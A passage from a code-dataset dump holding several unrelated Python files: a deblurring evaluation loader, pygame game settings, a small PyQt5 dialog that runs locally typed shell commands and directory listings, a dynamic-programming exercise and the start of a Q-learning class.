fmo_model(B,Hsc,rgba_tbd3d_or[:,:,:3,tmki],rgba_tbd3d_or[:,:,3,tmki])\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tseq_score_tracker_tbd3do.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd3d0,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\n\t\t\t\tif do_deblatting:\n\t\t\t\t\tstart = time.time()\n\t\t\t\t\test_hs_tbd_crop, est_hs_tbd3d_crop, rgba_tbd_crop, rgba_tbd3d_crop, est_traj_tbd, Hs = deblatting_runner(crop_only(I,bbox_debl),crop_only(B,bbox_debl),gtp.nsplits,debl_dim)\n\t\t\t\t\tav_score_tracker_tbd3d.next_time(time.time() - start)\n\t\t\t\t\test_traj_tbd[0] += bbox_debl[1]\n\t\t\t\t\test_traj_tbd[1] += bbox_debl[0]\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tgt_hs_debl_crop = crop_only(gt_hs, bbox_debl)\n\t\t\t\t\t\test_hs_tbd_crop, do_flip_debl = sync_directions(est_hs_tbd_crop, gt_hs_debl_crop)\n\t\t\t\t\t\test_hs_tbd3d_crop, do_flip_debl = sync_directions(est_hs_tbd3d_crop, gt_hs_debl_crop)\n\t\t\t\t\t\tif do_flip_debl:\n\t\t\t\t\t\t\trgba_tbd_crop = rgba_tbd_crop[:,:,:,::-1]\n\t\t\t\t\t\t\trgba_tbd3d_crop = rgba_tbd3d_crop[:,:,:,::-1]\n\t\t\t\t\test_hs_tbd = rev_crop_resize(est_hs_tbd_crop,bbox_debl,I)\n\t\t\t\t\test_hs_tbd3d = rev_crop_resize(est_hs_tbd3d_crop,bbox_debl,I)\n\t\t\t\t\trgb_tbd_crop = rev_crop_resize(rgba2rgb(rgba_tbd_crop),bbox_debl,I)\n\t\t\t\t\trgb_tbd3d_crop = rev_crop_resize(rgba2rgb(rgba_tbd3d_crop),bbox_debl,I)\n\t\t\t\t\tlogger_tbd.write_trajest(est_traj_tbd)\n\t\t\t\t\tif gtp.w_trajgt:\n\t\t\t\t\t\tiou = seq_score_tracker_tbd.next_traj(kk,gt_traj,est_traj_tbd,radius)\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tseq_score_tracker_tbd.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\t\tseq_score_tracker_tbd3d.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd3d,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tlogger_tbd3d.write_crops(kk,crop_only(rgb_tbd3d_crop,bbox_tight), crop_only(est_hs_tbd3d,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\t\n\t\t\tif do_sota18:\n\t\t\t\tif False:\n\t\t\t\t\test_hs_sota18 = run_sota18(I)\n\t\t\t\telse:\n\t\t\t\t\test_hs_sota18_crop = run_sota18(im_crop)\n\t\t\t\t\test_hs_sota18 = rev_crop_resize(est_hs_sota18_crop,bbox,I)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\twhile est_hs_sota18.shape[3] < gt_hs.shape[3]:\n\t\t\t\t\t\test_hs_sota18 = np.concatenate([est_hs_sota18, est_hs_sota18[...,-1:]],3)\n\t\t\t\t\tseq_score_tracker_sota18.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_sota18,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\telse:\n\t\t\t\t\test_hs_sota18 = np.concatenate([est_hs_sota18, est_hs_sota18[...,-1:]],3)\n\t\t\t\t\t\n\t\t\tif do_deblurgan:\n\t\t\t\test_hs_deblurgan_crop = run_deblurgan(im_crop)\n\t\t\t\test_hs_deblurgan = rev_crop_resize(est_hs_deblurgan_crop[...,None],bbox,I)[...,0]\n\t\t\t\test_hs_deblurgan = np.repeat(est_hs_deblurgan[...,None],gtp.nsplits,3)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tseq_score_tracker_dg.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_deblurgan,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\n\t\t\tif do_defmo:\n\t\t\t\tif multi_f > 1:\n\t\t\t\t\tgt_hs = np.repeat(gt_hs,multi_f,3)\n\n\t\t\t\tif gtp.w_trajgt:\n\t\t\t\t\tiou = seq_score_tracker.next_traj(kk,gt_traj,est_traj[:,::multi_f],radius)\n\t\t\t\t\tlogger.write_trajgt(gt_traj)\n\t\t\t\t\n\t\t\t\tgt_hs_crop = crop_resize(gt_hs, bbox, (g_resolution_x, g_resolution_y))\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\test_hs_crop, do_flip = sync_directions(est_hs_crop, gt_hs_crop)\n\t\t\t\telse:\n\t\t\t\t\test_hs_crop, est_traj, do_flip = sync_directions_smooth(est_hs_crop, est_traj, est_traj_prev, radius)\n\t\t\t\tif do_flip:\n\t\t\t\t\trenders_rgba = renders_rgba[:,:,:,::-1]\n\n\t\t\t\t# est_hs = None\n\t\t\t\t# if renders[:,:,-1:].max() > 0.05:\n\t\t\t\tlogger.write_trajest(est_traj)\n\t\t\t\test_hs = rev_crop_resize(est_hs_crop,bbox,I)\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t# logger.write_crops(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tlogger.write_crops_3c(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tseq_score_tracker.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tif eval_gt:\n\t\t\t\t\t\tinput_gt_batch = torch.zeros((gtp.nsplits,6,)+gt_hs_crop.shape[:2]).to(device).float()\n\t\t\t\t\t\tfor tempi in range(gtp.nsplits):\n\t\t\t\t\t\t\tinput_gt_batch[tempi] = torch.cat((preprocess(gt_hs_crop[:,:,:,tempi*multi_f]), preprocess(bgr_crop)), 0).to(device).float()\n\t\t\t\t\t\twith torch.no_grad():\n\t\t\t\t\t\t\tlatent = encoder(input_gt_batch)\n\t\t\t\t\t\t\ttimes = torch.linspace(0,1,eval_gt_steps+1)[:-1].to(device)\n\t\t\t\t\t\t\trenders_gt = rendering(latent,times[None].repeat(gtp.nsplits,1))\n\t\t\t\t\t\trenders_gt_rgba = renders_gt.data.cpu().detach().numpy().transpose(3,4,2,0,1)\n\t\t\t\t\t\test_gt_hs_crop = np.zeros(renders_gt_rgba.shape[:2]+(3,)+renders_gt_rgba.shape[3:])\n\t\t\t\t\t\told_traj = None\n\t\t\t\t\t\tfor tempi in range(gtp.nsplits):\n\t\t\t\t\t\t\test_gt_traj = renders2traj(renders_gt[tempi:(tempi+1)],device)[0].T.cpu().detach().numpy()\n\t\t\t\t\t\t\test_gt_hs_crop[:,:,:,tempi,:], nothing1, nothing2 = sync_directions_smooth(rgba2hs(renders_gt_rgba[:,:,:,tempi,:], bgr_crop), est_gt_traj, old_traj, 200)\n\t\t\t\t\t\t\told_traj = est_gt_traj\n\t\t\t\t\t\test_gt_hs = rev_crop_resize(est_gt_hs_crop.reshape(est_gt_hs_crop.shape[:3]+(eval_gt_steps*gtp.nsplits,)) ,bbox,I)\n\t\t\t\t\t\tlogger.write_crops_4c(kk,crop_only(rgba2rgb(rev_crop_resize(renders_rgba,bbox,np.ones(I.shape[:2]+(4,)))),bbox_tight), crop_only(est_hs,bbox_tight),crop_only(gt_hs,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight),crop_only(est_gt_hs,bbox_tight))\n\t\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# logger.write_crops(kk,rgba2rgb(renders_rgba), est_hs_crop, gt_hs_crop, im_crop, bgr_crop)\n\t\t\t\t\tlogger.write_crops_3c(kk,rgba2rgb(renders_rgba), est_hs_crop, gt_hs_crop, im_crop, bgr_crop)\n\n\t\t\t\tlogger.write_superres(I,est_hs,gt_hs)\n\t\t\t\tif verbose:\n\t\t\t\t\tseq_score_tracker.report(gtp.seqname, kk)\n\n\t\t\tif do_deblatting:\n\t\t\t\tlogger_tbd.write_superres(I,est_hs_tbd,gt_hs)\n\t\t\t\tlogger_tbd3d.write_superres(I,est_hs_tbd3d,gt_hs)\n\t\t\t\tif verbose:\n\t\t\t\t\tseq_score_tracker_tbd.report(gtp.seqname, kk)\n\t\t\t\t\tseq_score_tracker_tbd3d.report(gtp.seqname, kk)\n\t\t\tif do_tbdo and verbose:\n\t\t\t\tlogger_tbd3do.write_superres(I,est_hs_tbd3d0,gt_hs)\n\t\t\t\tseq_score_tracker_tbd3do.report(gtp.seqname, kk)\n\t\t\tif do_sota18 and verbose:\n\t\t\t\tseq_score_tracker_sota18.report(gtp.seqname, kk)\n\t\t\tif do_deblurgan and verbose:\n\t\t\t\tseq_score_tracker_dg.report(gtp.seqname, kk)\n\n\t\tif do_defmo:\n\t\t\tav_score_tracker.next(gtp.seqname, seq_score_tracker)\n\t\t\tlogger.close()\n\t\tif do_deblatting:\n\t\t\tav_score_tracker_tbd.next(gtp.seqname, seq_score_tracker_tbd)\n\t\t\tav_score_tracker_tbd3d.next(gtp.seqname, seq_score_tracker_tbd3d)\n\t\t\tlogger_tbd.close()\n\t\t\tlogger_tbd3d.close()\n\t\tif do_tbdo:\n\t\t\tav_score_tracker_tbd3do.next(gtp.seqname, seq_score_tracker_tbd3do)\n\t\t\tlogger_tbd3do.close()\n\t\tif do_sota18:\n\t\t\tav_score_tracker_sota18.next(gtp.seqname, seq_score_tracker_sota18)\n\t\tif do_deblurgan:\n\t\t\tav_score_tracker_dg.next(gtp.seqname, seq_score_tracker_dg)\n\t\n\tif do_defmo:\n\t\tav_score_tracker.close()\n\tif do_deblatting:\n\t\tav_score_tracker_tbd.close()\n\t\tav_score_tracker_tbd3d.close()\n\tif do_tbdo:\n\t\tav_score_tracker_tbd3do.close()\n\tif do_sota18:\n\t\tav_score_tracker_sota18.close()\n\tif do_deblurgan:\n\t\tav_score_tracker_dg.close()\n\n\ttorch.cuda.empty_cache()\n\t# pdb.set_trace()\n\n\ndef get_tbd_sample(framenum = -5, fileind = -1, mode = 'tbd'):\n\tnmed = 7\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\taspect_ratio = g_resolution_y / g_resolution_x\n\tfor ff in files[fileind:(fileind+1)]:\n\t\tseqname = os.path.split(ff)[-1][:-4]\n\t\tseqpath = folder + 'imgs/' + seqname + '/'\n\t\tif not os.path.exists(seqpath):\n\t\t\tprint('Directory does not exist')\n\t\t\treturn None\n\n\t\tpath = seqpath + \"{:08d}.png\".format(framenum)\n\t\tIm0 = cv2.imread(path,cv2.IMREAD_UNCHANGED)/255\n\t\tnfrm = np.min([nmed,framenum+1])\n\t\tVk = np.zeros(Im0.shape+(nfrm+nmed,))\n\t\tfor kk in range(nfrm):\n\t\t\tVk[:,:,:,kk] = cv2.imread(seqpath + \"{:08d}.png\".format(framenum-kk),cv2.IMREAD_UNCHANGED)/255\n\t\tfor kk in range(nmed):\n\t\t\tVk[:,:,:,nfrm+kk] = cv2.imread(seqpath + \"{:08d}.png\".format(framenum+kk+1),cv2.IMREAD_UNCHANGED)/255\n\t\t\n\t\tVk = Vk[:,:,[2,1,0]]\n\t\tI = Vk[:,:,:,0]\n\t\tB = np.median(Vk,3)\n\n\t\tif mode == 'tbd3d' or mode == 'tbdfalling':\n\t\t\tbbox, minor_axis_length = fmo_detect_maxarea(I,B)\n\t\telif mode == 'tbd':\n\t\t\tbbox, minor_axis_length = fmo_detect(I,B)\n\n\t\tbbox = np.array(bbox)\n\t\theight, width = bbox[2] - bbox[0], bbox[3] - bbox[1]\n\t\t\n\t\th2 = height*2\n\n\t\th2 = int(np.ceil(np.ceil(h2 / aspect_ratio) * aspect_ratio))\n\t\tw2 = int(h2 / aspect_ratio)\n\n\t\twdiff = w2 - width\n\t\twdiff2 = int(wdiff/2)\n\t\thdiff = h2 - height\n\t\thdiff2 = int(hdiff/2)\n\n\t\tbbox[0] -= hdiff2\n\t\tbbox[2] += hdiff-hdiff2\n\t\tbbox[1] -= wdiff2\n\t\tbbox[3] += wdiff-wdiff2\n\n\t\tim = I[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n\t\timr = cv2.resize(im, (g_resolution_x, g_resolution_y), interpolation = cv2.INTER_CUBIC)\n\n\t\tbgr = B[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n\t\tbgrr = cv2.resize(bgr, (g_resolution_x, g_resolution_y), interpolation = cv2.INTER_CUBIC)\n\t\tpreprocess = get_transform()\n\t\tinput_batch = torch.cat((preprocess(imr), preprocess(bgrr)), 0).float()\n\n\t\t# pdb.set_trace()\n\t\t# save_image(preprocess(I).clone(),'/home.stud/rozumden/tmp.png')\n\n\t\treturn input_batch\n\n\ndef dataset2png(mode = 'tbd'):\n\tgenerate_LS = False\n\tgenerate_HS = True\n\tkn = 8\n\tuse_gt_bbox = True\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\t# pdb.set_trace()\n\tseqi = 0\n\tfor ff in files:\n\t\tnew_version = True\n\t\ttry:\n\t\t\tf = h5py.File(ff, 'r')\n\t\texcept: ## older matlab versions\n\t\t\tnew_version = False\n\t\t\tf = scipy.io.loadmat(ff)\n\n\t\tseqname = os.path.split(ff)[-1][:-4]\n\t\tseqpath = folder + 'imgs/' + seqname + '/'\n\t\tif not os.path.exists(seqpath):\n\t\t\tos.makedirs(seqpath)\n\n\t\tkeys = f.keys()\n\n\t\tif generate_LS and 'Vk' in keys:\n\t\t\tif new_version:\n\t\t\t\tVk = (np.array(f['Vk']).transpose(3,2,1,0)[:,:,:,:]/255).astype(np.float32) # [2,1,0]\n\t\t\telse:\n\t\t\t\tVk = (np.array(f['Vk'])/255).astype(np.float32)\n\t\telse:\n\t\t\tims = np.array(f['V'])\n\t\t\tif ims.shape[2] == 3:\n\t\t\t\tV = (ims.transpose(1,0,2,3)[::-1]/255).astype(np.float32)\n\t\t\t\tif generate_LS:\n\t\t\t\t\tVk = generate_lowFPSvideo(V,k=kn,do_WB=False,gamma_coef=1.0).astype(np.float32)\n\t\t\telse:\n\t\t\t\tV = (ims.transpose(3,2,1,0)[:,:,:,:]/255).astype(np.float32)\n\t\t\t\tV = generate_lowFPSvideo(V,k=1).astype(np.float32)\n\t\t\t\tif generate_LS:\n\t\t\t\t\tVk = generate_lowFPSvideo(V,k=kn).astype(np.float32)\n\n\t\tif generate_LS:\n\t\t\tpars = []\n\t\t\tif 'PAR' in keys:\n\t\t\t\tpars = f['PAR']\n\t\t\telif 'POS' in keys:\n\t\t\t\tpars = f['POS']\n\t\t\tall_par = []\n\t\t\tfor kk in range(Vk.shape[3]):\n\t\t\t\tif pars != []:\n\t\t\t\t\tif new_version:\n\t\t\t\t\t\tif 'PAR' in keys:\n\t\t\t\t\t\t\tpar = np.array(f[pars[kk][0]]).T\n\t\t\t\t\t\telif 'R' in keys:\n\t\t\t\t\t\t\tpar = (np.array(pars[kk*kn:kn*(kk+1),:]).T)\n\t\t\t\t\t\t\trad = (f['R'][:].squeeze()[kk*kn:kn*(kk+1)])\n\t\t\t\t\telse:\n\t\t\t\t\t\tpar = pars[0][kk]\n\t\t\t\t\tif all_par == []:\n\t\t\t\t\t\tall_par = np.zeros((Vk.shape[3]*2, par.shape[1]))\n\t\t\t\t\t\tall_rad = np.zeros((Vk.shape[3], par.shape[1]))\n\t\t\t\t\tall_par[2*kk:2*kk+2,:] = par\n\t\t\t\t\tif 'R' in keys:\n\t\t \t\t\t\tall_rad[kk:kk+1,:] = rad\n\t\t\t\tI = Vk[:,:,:,kk]\n\t\t\t\tpath = seqpath + \"{:08d}.png\".format(kk)\n\t\t\t\tIms = Image.fromarray((I * 255).astype(np.uint8))\n\t\t\t\tIms.save(path)\n\t\t\t\tprint('Seq {}, frm {}'.format(seqname, kk))\n\t\t\tif pars != []:\n\t\t\t\tnp.savetxt(seqpath + 'gt.txt', all_par, fmt='%.2f')\n\t\t\t\tif 'R' in keys:\n\t\t\t\t\tnp.savetxt(seqpath + 'gtr.txt', all_rad, fmt='%.2f')\n\t\tif generate_HS:\n\t\t\thspath = folder + 'imgs_gt/' + seqname + '/'\n\t\t\tif not os.path.exists(hspath):\n\t\t\t\tos.makedirs(hspath)\n\t\t\tfor kk in range(V.shape[3]):\n\t\t\t\tI = V[:,:,:,kk]\n\t\t\t\tpath = hspath + \"{:08d}.png\".format(kk)\n\t\t\t\tIms = Image.fromarray((I * 255).astype(np.uint8))\n\t\t\t\tIms.save(path)\n\t\t\t\tprint('Seq {}, hs frm {}'.format(seqname, kk))\n\n\t\tif new_version:\n\t\t\tf.close()\n\n\t\tprint('Finished seq {}'.format(seqname))\n\t\tseqi += 1\n\treturn None\n\n\n","sub_path":"dataloaders/tbd_loader.py","file_name":"tbd_loader.py","file_ext":"py","file_size_in_byte":19376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"520474326","text":"\n\nfrom xai.brain.wordbase.nouns._ogre import _OGRE\n\n#calss header\nclass _OGRES(_OGRE, ):\n\tdef __init__(self,): \n\t\t_OGRE.__init__(self)\n\t\tself.name = \"OGRES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ogre\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_ogres.py","file_name":"_ogres.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"35874399","text":"import pygame\nimport os\n\n# screen size\nWIN_WIDTH = 1024\nWIN_HEIGHT = 600\n\n# path\nIMAGE_PATH = os.path.join(os.path.dirname(__file__), \"images\")\nSOUND_PATH = os.path.join(os.path.dirname(__file__), \"sound\")\n\n\n# image\nBACKGROUND_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"NCKU.png\")), (WIN_WIDTH, WIN_HEIGHT))\nSTOP_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"stop.png\")), (30, 30))\nPOPULARITY_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"popularity.png\")), (210, 140))\nCALENDER_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"calendar.png\")), (30, 30))\n\n# story\nDIALOGUE_IMAGE = []\nfor i in range(4):\n DIALOGUE_IMAGE.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"story{i+1}.png\")), (600, 158)))\nALARM_IMAGE = []\nfor i in range(3):\n ALARM_IMAGE.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"story{i+5}.jpg\")), (WIN_WIDTH, WIN_HEIGHT)))\nskip_btn = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"skip_btn.png\")), (100, 50))\n\nThumbnail_WIDTH = 204\nThumbnail_HEIGHT = 136\nThumbnail = []\nfor i in range(12):\n Thumbnail.append(pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, f\"background_{i}.jpg\")), (Thumbnail_WIDTH, Thumbnail_HEIGHT)))\n\nPRESIDENT_IMAGE = pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"president.png\")), (600, 340))\nSUCCESSFUL_IMAGE=pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"game_over_successful.jpg\")), (600, 340))\nDEFECT_IMAGE=pygame.transform.scale(pygame.image.load(os.path.join(IMAGE_PATH, \"game_over_defect.jpg\")), (600, 340))\n\n# frame rate\nFPS = 60\n# color\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nPURPLE = (147, 0, 147)\n\nPATH_1 = [(35, 431), (98, 380), (420, 380), (420, 537)]\nPATH_2 = [(419, 28), (419, 110), (657, 110), (657, 349), (582, 380), (420, 380), (420, 537)]\nPATH_3 = [(417, 28), (418, 107), (98, 106), (97, 170), (138, 221), (418, 218), (420, 536)]\nVACANCY = [(110, 448), (331, 444), (179, 160), (291, 157), (417, 163), (338, 296), (233, 295), (142, 292), (496, 294), (584, 167), (498, 444), (582, 297)]\n# enemy path\n'''# 打開txt檔\nfileObject = open(\"paths/path_1.txt \", 'r')\n# 讀取一行內容\nline = fileObject.readline()\n# 將內容append進[]\nPATH_1 = []\nwhile line:\n PATH_1.append(eval(line))\n line = fileObject.readline()\n# 關閉txt檔\nfileObject.close()\n\n# 打開txt檔\nfileObject = open(\"paths/path_2.txt \", 'r')\n# 讀取一行內容\nline = fileObject.readline()\n# 將內容append進[]\nPATH_2 = []\nwhile line:\n PATH_2.append(eval(line))\n line = fileObject.readline()\n# 關閉txt檔\nfileObject.close()\n\n# 打開txt檔\nfileObject = open(\"paths/path_3.txt \", 'r')\n# 讀取一行內容\nline = fileObject.readline()\n# 將內容append進[]\nPATH_3 = []\nwhile line:\n PATH_3.append(eval(line))\n line = fileObject.readline()\n# 關閉txt檔\nfileObject.close()\n\n# 打開txt檔\nfileObject = open(\"paths/vacancy.txt \", 'r')\n# 讀取一行內容\nline = fileObject.readline()\n# 將內容append進[]\nVACANCY = []\nwhile line:\n VACANCY.append(eval(line))\n line = fileObject.readline()\n# 關閉txt檔\nfileObject.close()'''\n\n# base\nBASE = pygame.Rect(415, 535, 50, 50)\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"644958297","text":"\r\nimport os\r\nimport sys\r\nimport ctypes\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nappid = u'company.product.subproduct.version'\r\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(appid)\r\n\r\n\r\nclass Ui_Dialog(object):\r\n\r\n def setupUi(self, Dialog):\r\n Dialog.setObjectName(\"Dialog\")\r\n Dialog.resize(400, 300)\r\n self.ListDrives = QtWidgets.QPushButton(Dialog)\r\n self.ListDrives.setGeometry(QtCore.QRect(40, 30, 75, 23))\r\n self.ListDrives.setObjectName(\"ListDrives\")\r\n self.ListDir = QtWidgets.QPushButton(Dialog)\r\n self.ListDir.setGeometry(QtCore.QRect(40, 70, 75, 23))\r\n self.ListDir.setObjectName(\"ListDir\")\r\n self.ListFiles = QtWidgets.QPushButton(Dialog)\r\n self.ListFiles.setGeometry(QtCore.QRect(40, 110, 75, 23))\r\n self.ListFiles.setObjectName(\"ListFiles\")\r\n self.lineEdit = QtWidgets.QLineEdit(Dialog)\r\n self.lineEdit.setGeometry(QtCore.QRect(160, 30, 113, 20))\r\n self.lineEdit.setObjectName(\"lineEdit\")\r\n self.execButton = QtWidgets.QPushButton(Dialog)\r\n self.execButton.setGeometry(QtCore.QRect(160, 70, 75, 23))\r\n self.execButton.setObjectName(\"execButton\")\r\n\r\n self.retranslateUi(Dialog)\r\n QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n _translate = QtCore.QCoreApplication.translate\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\r\n self.ListDrives.setText(_translate(\"Dialog\", \"Drives\"))\r\n self.ListDir.setText(_translate(\"Dialog\", \"Directories\"))\r\n self.ListFiles.setText(_translate(\"Dialog\", \"Files\"))\r\n self.execButton.setText(_translate(\"Dialog\", \"Execute\"))\r\n self.execButton.clicked.connect(self.addInputTextToListbox)\r\n self.ListDrives.clicked.connect(self.listLocalDrives)\r\n self.ListDir.clicked.connect(self.listDirectories)\r\n self.ListFiles.clicked.connect(self.listFilesOnly)\r\n\r\n def addInputTextToListbox(self):\r\n cmd = self.lineEdit.text()\r\n if cmd == \"\":\r\n os.system('echo Please enter a command to execute.')\r\n else:\r\n os.system('cls')\r\n os.system(cmd)\r\n\r\n def listLocalDrives(self):\r\n os.system('cls')\r\n os.system('fsutil fsinfo drives')\r\n\r\n def listDirectories(self):\r\n os.system('cls')\r\n os.system('dir /ad')\r\n\r\n def listFilesOnly(self):\r\n os.system('cls')\r\n os.system('dir /b /oe')\r\n\r\nif __name__ == \"__main__\":\r\n\r\n app = QtWidgets.QApplication([])\r\n app.setWindowIcon(QtGui.QIcon('hp.ico'))\r\n\r\n Dialog = QtWidgets.QDialog()\r\n proofofconcept = Ui_Dialog()\r\n proofofconcept.setupUi(Dialog)\r\n\r\n Dialog.setWindowTitle('Proof of Concept with PyQt5')\r\n Dialog.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"CmdButtons2.py","file_name":"CmdButtons2.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292019289","text":"import math #99999 시간 찍어보면 12초 걸리는데 왜 맞는지 모르겠넹\n\nN = int(input())\ndp = [0]*(N+1) #직관적으로 편하게 이해하기 위해 그 숫자는 배열의 그 숫자 인덱스에 넣기로함 ex) 1->dp[1]\n\nfor i in range(1,N+1,1):\n s = int(math.sqrt(i))\n if s*s == i: #제곱수인 경우\n dp[i] = 1\n else : #제곱수가 아닌 경우, 제곱근의 소숫점 버린 값의 수부터 시작해서 가장 작은 값을 찾음\n m=9999999\n for j in range(s,0,-1):\n m = min(m,dp[i-(j*j)])\n dp[i] = m+1\nprint(dp[N])\n\n\n\n\n\n\n\n\n# import math #11,7은 잘 되는데 99999 하면 4가 아닌 6나옴\n\n# N = int(input())\n# dp = [0]*(N+1) #직관적으로 편하게 이해하기 위해 그 숫자는 배열의 그 숫자 인덱스에 넣기로함 ex) 1->dp[1]\n\n# for i in range(1,N+1,1):\n# s = int(math.sqrt(i))\n# if s*s == i: #제곱수인 경우\n# dp[i] = 1\n# else : #제곱수가 아닌 경우, 제곱근의 소숫점 버린 값의 수의 제곱을 포함하고(+1), 남은 수 중 최적의 값 더 해주면 이 수 역시 최적화\n# dp[i] = dp[i-(s*s)] +1\n# print(dp[N])","sub_path":"2020_spring/2020_04_01/1699_JH.py","file_name":"1699_JH.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467283489","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport timeit\nimport collections\nimport random\nimport itertools\nfrom numba import jit, njit, prange\nimport numba\nimport pickle\nfrom scipy.special import comb,binom\nimport bisect\nfrom carsharing_N import CarSharN\n\n##############################################################################\n \n# Q-learning\n\n##############################################################################\n\nclass Qlearning():\n '''Implementation of the Q-leaning Agent \n example:\n ql = Qlearning(env, 0, 0.95,0.4,10000,[(5,16),(4,18),(7,14)],1000)\n Q_list = ql.train(interactive_plot = True, verbose = True)\n '''\n \n def __init__(self, ENV,\n SEED,\n GAMMA=0.95, \n eps_greedy_par=0.4,\n NUM_STEPS=500001,\n interactive_plot_states=[(871,0),(1020,0),(894,0)],#[(463,0),(564,1),(453,8)],#[(1712,0),(1685,1),(2184,18)],#[(10,16),(11,16),(9,16)],#[(1151,9),(1275,5),(839,8)],#[(5,10),(4,19),(9,11)],#[(108,10),(101,19),(112,11)],#[(276,10),(314,19),(129,11)],\n num_to_save_Q=2500,\n polynomial_lr = 0.5,\n Lzero = -100,\n Uzero = 100,\n ):\n self.env = ENV\n self.env.seed(SEED)\n self.env.action_space.seed(SEED)\n self.env.gamma = GAMMA\n self.gamma = GAMMA\n self.prng = np.random.RandomState(SEED) #Pseudorandom number generator\n print('SEED_ENV:',SEED,'SEED:',SEED)\n self.count = np.zeros([self.env.nS, self.env.nA])\n self.Lzero = Lzero\n self.Uzero = Uzero\n L = np.ones((self.env.nS, self.env.nA)) * self.Lzero/(1-self.gamma)\n U = np.ones((self.env.nS, self.env.nA)) * self.Uzero/(1-self.gamma)\n self.Q = self.prng.uniform(L,U) \n self.eps_greedy_par = eps_greedy_par\n self.num_steps = NUM_STEPS\n self.SQLsa_1 = []\n self.SQLsa_2 = []\n self.SQLsa_3 = []\n \n self.Q_list = []\n self.sa1 = interactive_plot_states[0]\n self.sa2 = interactive_plot_states[1]\n self.sa3 = interactive_plot_states[2]\n \n self.num_to_save_Q = num_to_save_Q\n \n self.perc_flags = [0,0,0,0,0]\n self.polynomial_lr = polynomial_lr\n \n self.rel_er_stps = 